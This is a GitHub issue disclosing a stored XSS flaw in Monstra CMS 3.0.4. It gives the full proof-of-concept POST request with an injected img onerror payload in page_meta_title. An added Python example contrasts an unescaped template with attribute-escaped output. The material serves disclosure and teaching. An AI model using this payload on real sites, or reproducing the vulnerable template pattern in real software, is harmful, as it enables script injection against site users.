monstra-cms / monstra

THIS PROJECT IS NOT SUPPORTED ANYMORE! Check FLEXTYPE.ORG
http://flextype.org
MIT License

Stored XSS in Monstra CMS 3.0.4 #458

Open PrincyEdward opened 5 years ago

PrincyEdward commented 5 years ago

Monstra - Version 3.0.4

Exploit URI :
http://localhost/path/admin/index.php?id=pages&action=add_page
http://localhost/path/admin/index.php?id=pages&action=edit_page&name=

Parameter -> page_meta_title

POC:

POST /path/admin/index.php?id=pages&action=edit_page&name=aaaa HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/path/admin/index.php?id=pages&action=edit_page&name=aaaa
Content-Type: application/x-www-form-urlencoded
Content-Length: 460
Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17;
Connection: close
Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa&old_parent=home&page_id=5&page_title=sample&page_name=sample&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=home&templates=index&status=published&access=public&editor=&page_tags=&edit_page_and_exit=Save+and+Exit&page_date=2018-09-12+16%3A34%3A54
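The bug class behind this report, worked through as an added example that is not part of the original issue and not Monstra's own code. It decodes the posted `page_meta_title` value exactly as the server would, renders it through a hypothetical template the way the report implies (the payload's leading `">` only makes sense if the stored value lands inside a quoted attribute, so a `<meta>` tag is assumed), and contrasts that with attribute-context escaping. The template functions, the tag counter and the trimmed copy of the POST body are all constructed for the example.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed: a trimmed copy of the POST body from the report, carrying only
# the fields this example uses. Not captured from a live Monstra instance.
POST_BODY = (
    "csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa"
    "&page_title=sample&page_name=sample"
    "&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E"
    "&page_keywords=&page_description=&status=published"
)


def parse_post_body(body: str) -> dict:
    """Decode an application/x-www-form-urlencoded body into single-valued fields,
    the same transformation PHP applies before populating $_POST."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def render_head_vulnerable(meta_title: str) -> str:
    """Hypothetical template (assumption, not Monstra's code): the stored value is
    interpolated into an attribute with no escaping. This is the pattern that
    turns a stored string into markup."""
    return f'<meta name="title" content="{meta_title}">'


def render_head_hardened(meta_title: str) -> str:
    """Same template with attribute-context escaping. quote=True encodes both
    quote characters, so the value cannot terminate the attribute it sits in."""
    return f'<meta name="title" content="{html.escape(meta_title, quote=True)}">'


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, in document order."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.attrs: dict[str, list] = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.setdefault(tag, []).append(attrs)


def tags_in(markup: str) -> list[str]:
    """Parse a fragment the way a browser would and return the tags it creates.
    A value that stayed inside its attribute contributes no tag of its own."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def meta_content(markup: str) -> str:
    """Return the decoded content attribute of the first <meta> tag, to show that
    escaping preserves the stored text while denying it any markup meaning."""
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return dict(collector.attrs["meta"][0]).get("content", "")


if __name__ == "__main__":
    fields = parse_post_body(POST_BODY)
    payload = fields["page_meta_title"]
    print("decoded page_meta_title:", payload)
    for label, render in (("vulnerable", render_head_vulnerable),
                          ("hardened", render_head_hardened)):
        markup = render(payload)
        print(f"{label}: {markup}")
        print(f"  tags created by the browser parser: {tags_in(markup)}")
```

Running it shows the decoded value `prince"><img src=x onerror=alert(1)>`: the unescaped template yields two elements, `meta` and an `img` whose `onerror` handler runs on every page view that includes the head, while the escaped template yields only `meta`, with the parser returning the original text as the attribute's value. The fix is therefore output encoding at the point of rendering, chosen for the attribute context, rather than input filtering on the admin form.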